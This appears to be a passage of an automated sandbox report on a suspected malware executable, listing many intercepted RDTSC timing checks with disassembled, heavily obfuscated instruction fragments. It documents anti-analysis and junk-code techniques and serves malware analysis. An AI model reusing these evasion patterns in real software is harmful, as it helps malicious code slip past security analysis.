Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10043B5 second address: 10043D5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6D94F5108Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1004695 second address: 10046BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94B29706h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnl 00007F6D94B296F6h 0x00000010 jne 00007F6D94B296F6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10046BE second address: 10046C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10046C4 second address: 10046E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F6D94B29705h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10046E1 second address: 10046EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10046EA second address: 10046EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10046EE second address: 10046F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1004D85 second address: 1004D8B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1004D8B second address: 1004DAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6D94F51085h 0x0000000b push esi 0x0000000c js 00007F6D94F51076h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1004DAF second address: 1004DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1004DB8 second address: 1004DBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1004F25 second address: 1004F29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1005424 second address: 100542D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1007B16 second address: 1007B1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 100A219 second address: 100A21D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 100A21D second address: 100A23D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b jmp 00007F6D94B29704h 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 100A23D second address: 100A247 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F6D94F51076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10102B6 second address: 10102CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F6D94B296F8h 0x0000000a popad 0x0000000b jnp 00007F6D94B29728h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10102CD second address: 10102D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F6D94F51076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10102D7 second address: 10102DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10102DB second address: 10102F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F6D94F51076h 0x00000010 js 00007F6D94F51076h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 101046B second address: 1010480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6D94B29701h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10105BA second address: 10105DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6D94F51082h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F6D94F51076h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10105DC second address: 10105E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10105E0 second address: 10105F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94F51083h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10105F7 second address: 1010609 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6D94B296FEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1010609 second address: 101060D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1010A3B second address: 1010A3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1010A3F second address: 1010A57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6D94F51082h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1011917 second address: 101191B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 101216A second address: 1012174 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F6D94F51076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 101228F second address: 1012293 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1012293 second address: 1012299 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10123E9 second address: 10123ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10124A9 second address: 10124BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94F5107Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10124BC second address: 10124C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10124C2 second address: 10124D5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6D94F51076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10124D5 second address: 10124D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10124D9 second address: 10124DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10124DD second address: 10124E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10124E3 second address: 10124E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10124E9 second address: 10124ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10128AB second address: 10128B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10128B0 second address: 10128B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10135DF second address: 10135E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10135E4 second address: 10135EE instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6D94B296FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10134C0 second address: 10134D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94F51083h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1015FA0 second address: 1015FCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F6D94B296F6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6D94B29707h 0x00000012 jne 00007F6D94B296F6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 101658D second address: 1016592 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1016592 second address: 10165A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6D94B29700h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10165A6 second address: 10165AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10184D8 second address: 1018571 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94B29701h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jg 00007F6D94B2970Eh 0x00000010 nop 0x00000011 movsx edi, ax 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007F6D94B296F8h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 mov edi, ebx 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push ecx 0x00000037 call 00007F6D94B296F8h 0x0000003c pop ecx 0x0000003d mov dword ptr [esp+04h], ecx 0x00000041 add dword ptr [esp+04h], 00000016h 0x00000049 inc ecx 0x0000004a push ecx 0x0000004b ret 0x0000004c pop ecx 0x0000004d ret 0x0000004e mov dword ptr [ebp+122D2AC7h], ecx 0x00000054 mov esi, 22260F79h 0x00000059 xchg eax, ebx 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007F6D94B296FFh 0x00000061 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 101910C second address: 1019121 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94F51081h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1019121 second address: 10191D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94B296FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jns 00007F6D94B296FCh 0x00000011 jmp 00007F6D94B296FAh 0x00000016 popad 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007F6D94B296F8h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 0000001Dh 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 mov dword ptr [ebp+12456787h], ecx 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push edx 0x0000003d call 00007F6D94B296F8h 0x00000042 pop edx 0x00000043 mov dword ptr [esp+04h], edx 0x00000047 add dword ptr [esp+04h], 0000001Ah 0x0000004f inc edx 0x00000050 push edx 0x00000051 ret 0x00000052 pop edx 0x00000053 ret 0x00000054 je 00007F6D94B296FCh 0x0000005a mov esi, dword ptr [ebp+12444D85h] 0x00000060 or esi, 19FA9971h 0x00000066 push 00000000h 0x00000068 pushad 0x00000069 sub di, A099h 0x0000006e mov edx, dword ptr [ebp+122D393Eh] 0x00000074 popad 0x00000075 xchg eax, ebx 0x00000076 pushad 0x00000077 jmp 00007F6D94B29706h 0x0000007c push eax 0x0000007d push edx 0x0000007e push eax 0x0000007f push edx 0x00000080 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10191D9 second address: 10191DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10191DD second address: 10191ED instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6D94B296F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: FCB40A second address: FCB41C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6D94F5107Ch 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 101E132 second address: 101E14A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c jmp 00007F6D94B296FBh 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 101E14A second address: 101E150 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1020639 second address: 1020642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 101E150 second address: 101E154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1020642 second address: 10206E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a js 00007F6D94B29701h 0x00000010 pushad 0x00000011 movzx edi, di 0x00000014 and ecx, dword ptr [ebp+122D1801h] 0x0000001a popad 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007F6D94B296F8h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 00000015h 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 jmp 00007F6D94B29707h 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push edx 0x00000041 call 00007F6D94B296F8h 0x00000046 pop edx 0x00000047 mov dword ptr [esp+04h], edx 0x0000004b add dword ptr [esp+04h], 00000017h 0x00000053 inc edx 0x00000054 push edx 0x00000055 ret 0x00000056 pop edx 0x00000057 ret 0x00000058 jl 00007F6D94B296F8h 0x0000005e mov edi, edx 0x00000060 jl 00007F6D94B296FCh 0x00000066 mov dword ptr [ebp+122D2B35h], esi 0x0000006c xchg eax, esi 0x0000006d jnp 00007F6D94B29702h 0x00000073 push eax 0x00000074 pushad 0x00000075 push eax 0x00000076 push edx 0x00000077 pushad 0x00000078 popad 0x00000079 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 101E154 second address: 101E158 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 101E158 second address: 101E1E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jno 00007F6D94B296FCh 0x0000000f push dword ptr fs:[00000000h] 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007F6D94B296F8h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 00000014h 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 push 00000000h 0x00000039 push edi 0x0000003a call 00007F6D94B296F8h 0x0000003f pop edi 0x00000040 mov dword ptr [esp+04h], edi 0x00000044 add dword ptr [esp+04h], 00000016h 0x0000004c inc edi 0x0000004d push edi 0x0000004e ret 0x0000004f pop edi 0x00000050 ret 0x00000051 mov eax, dword ptr [ebp+122D0909h] 0x00000057 mov edi, dword ptr [ebp+122D1962h] 0x0000005d push FFFFFFFFh 0x0000005f and di, 9E3Ah 0x00000064 jmp 00007F6D94B296FDh 0x00000069 nop 0x0000006a push eax 0x0000006b push edx 0x0000006c jnc 00007F6D94B296FCh 0x00000072 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10207D8 second address: 10207DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10215F0 second address: 10215F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10207DE second address: 10207E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10215F4 second address: 10215FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10225E9 second address: 10225ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1021816 second address: 102182C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jl 00007F6D94B29702h 0x0000000e jl 00007F6D94B296FCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10225ED second address: 10225F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10225F9 second address: 10225FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10225FD second address: 1022661 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6D94F51076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b nop 0x0000000c movzx ebx, dx 0x0000000f push 00000000h 0x00000011 sub edi, 620C9291h 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007F6D94F51078h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 0000001Bh 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 mov ebx, dword ptr [ebp+122D1CE0h] 0x00000039 jmp 00007F6D94F51081h 0x0000003e mov edi, dword ptr [ebp+122D37DAh] 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 push edi 0x00000048 js 00007F6D94F51076h 0x0000004e pop edi 0x0000004f rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10218DA second address: 10218DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10218DE second address: 10218ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007F6D94F51076h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10218ED second address: 102190C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6D94B29704h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 102190C second address: 1021912 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1021912 second address: 102191C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F6D94B296F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10235D2 second address: 10235DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F6D94F51076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 10235DC second address: 1023648 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94B296FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F6D94B296F8h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push edx 0x0000002b call 00007F6D94B296F8h 0x00000030 pop edx 0x00000031 mov dword ptr [esp+04h], edx 0x00000035 add dword ptr [esp+04h], 0000001Bh 0x0000003d inc edx 0x0000003e push edx 0x0000003f ret 0x00000040 pop edx 0x00000041 ret 0x00000042 and edi, 29CEAE00h 0x00000048 push 00000000h 0x0000004a mov dword ptr [ebp+122D1BFAh], ecx 0x00000050 xchg eax, esi 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 pushad 0x00000055 popad 0x00000056 pop eax 0x00000057 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1023648 second address: 102364E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1022866 second address: 1022877 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6D94B296F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 1022877 second address: 102287E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
